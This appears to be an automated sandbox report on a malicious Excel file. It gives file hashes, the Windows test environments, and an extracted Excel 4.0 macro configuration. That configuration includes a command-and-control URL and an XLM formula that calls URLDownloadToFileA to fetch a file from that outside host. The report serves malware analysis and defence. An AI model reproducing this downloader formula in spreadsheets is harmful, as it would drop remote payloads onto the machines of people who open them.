Behavioral task: behavioral1
Sample: db51470283d68b4eb4bcaa7ec2479a06d41503cd5862214f97e4f394748b36c3.xls
Resource: win7v20201028, windows7_x64
0 signatures
0 seconds
Behavioral task: behavioral2
Sample: db51470283d68b4eb4bcaa7ec2479a06d41503cd5862214f97e4f394748b36c3.xls
Resource: win10v20201028, windows10_x64
0 signatures
0 seconds
General
Target: 5527146056155136.zip
Size: 11KB
MD5: bda336dfdf5f1db4824bbe1650f7b7cc
SHA1: 6767e6b4ea3f2df27fa645af10424e86b8ab4041
SHA256: bb855c66321ea9de7518e375451bb97aaf2e48277dc96384ef8f1ab34c61e1b0
SHA512: e6b0913c54bf530bb6e6b16c7e2e0745e189083863304101b39abce7d64a166b5b4d121144e344a2289808905b5134b1c8e844cd7fe288e51120940c4a8bc06a
Malware Config
Extracted
Rule: Excel 4.0 XLM Macro
C2: http://xjw10whta03ytgdi.com/inda.xls
Attributes
formulas: =CALL("URLMon","URLDownloadToFileA","JJCCBB",0,"http://xjw10whta03ytgdi.com/inda.xls","..\fkruf.djr",0)
Signatures
Files
5527146056155136.zip.zip
Password: infected
db51470283d68b4eb4bcaa7ec2479a06d41503cd5862214f97e4f394748b36c3.xls windows office2003